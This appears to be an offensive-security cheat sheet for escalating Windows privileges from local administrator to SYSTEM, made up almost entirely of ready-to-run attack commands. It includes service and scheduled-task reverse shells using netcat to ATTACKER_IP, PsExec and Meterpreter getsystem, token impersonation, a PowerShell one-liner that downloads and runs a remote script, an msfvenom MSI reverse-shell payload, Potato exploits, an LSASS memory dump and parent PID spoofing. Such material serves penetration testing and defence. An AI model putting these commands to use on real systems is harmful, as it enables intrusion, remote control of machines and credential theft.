From High to SYSTEM

Overview

High integrity (local admin) is not SYSTEM. Some post-exploitation tasks require SYSTEM — dumping LSASS, accessing certain registry hives, or interacting with services. Multiple paths to escalate.

Create New Service

sc create EvilService binpath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" start= auto
sc start EvilService

Or for a command:

sc create EvilService binpath= "cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
sc start EvilService

Cleanup:

sc delete EvilService

PsExec

Sysinternals PsExec with -s flag runs as SYSTEM.

PsExec64.exe -accepteula -s -i cmd.exe

Interactive SYSTEM shell:

PsExec64.exe -accepteula -s -i powershell.exe

Remote SYSTEM:

PsExec64.exe -accepteula -s \\TARGET cmd.exe

Scheduled Task

schtasks /create /tn "EvilTask" /tr "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "EvilTask"

Cleanup:

schtasks /delete /tn "EvilTask" /f

Named Pipes — Meterpreter getsystem

Meterpreter automates named pipe impersonation:

meterpreter > getsystem

Three techniques:

Named pipe impersonation (default)
Token duplication
Named pipe impersonation (RPCSS variant)

Token Manipulation

Incognito (Meterpreter)

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"

PowerShell — Invoke-TokenManipulation

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-TokenManipulation.ps1')
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

DLL Hijacking on SYSTEM Service

If a SYSTEM service loads DLL from writable path:

Find writable DLL path (see Service Exploits)
Drop malicious DLL
Restart service → executes as SYSTEM

AlwaysInstallElevated → SYSTEM

If enabled, MSI installs as SYSTEM:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f msi -o shell.msi

msiexec /quiet /qn /i shell.msi

See Misconfigurations.

SeImpersonate → SYSTEM

If high integrity process has SeImpersonatePrivilege:

PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"

See Potato Attacks.

SeDebug + SeImpersonate

With both privileges, migrate into SYSTEM process:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Or via Meterpreter:

meterpreter > ps
meterpreter > migrate <SYSTEM_PID>

Parent PID Spoofing

Create process with SYSTEM process as parent:

$parent = Get-Process -Name "winlogon" | Select -First 1
# Use NtCreateProcess or CreateProcess with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS

Tools:

https://github.com/decoder-it/psgetsystem

Import-Module .\psgetsys.ps1
[MyProcess]::CreateProcessFromParent((Get-Process winlogon).Id, "cmd.exe")

Quick Reference

Method	Requires	Complexity
PsExec -s	Admin + PsExec on disk	Low
New service	Admin	Low
Scheduled task	Admin	Low
Meterpreter getsystem	Meterpreter session	Low
Token manipulation	Admin + tool	Medium
Parent PID spoofing	Admin + SeDebug	Medium
Potato attacks	SeImpersonate	Medium

Documentation Index

​Overview

​Create New Service

​PsExec

​Scheduled Task

​Named Pipes — Meterpreter getsystem

​Token Manipulation

​Incognito (Meterpreter)

​PowerShell — Invoke-TokenManipulation

​DLL Hijacking on SYSTEM Service

​AlwaysInstallElevated → SYSTEM

​SeImpersonate → SYSTEM

​SeDebug + SeImpersonate

​Parent PID Spoofing

​Quick Reference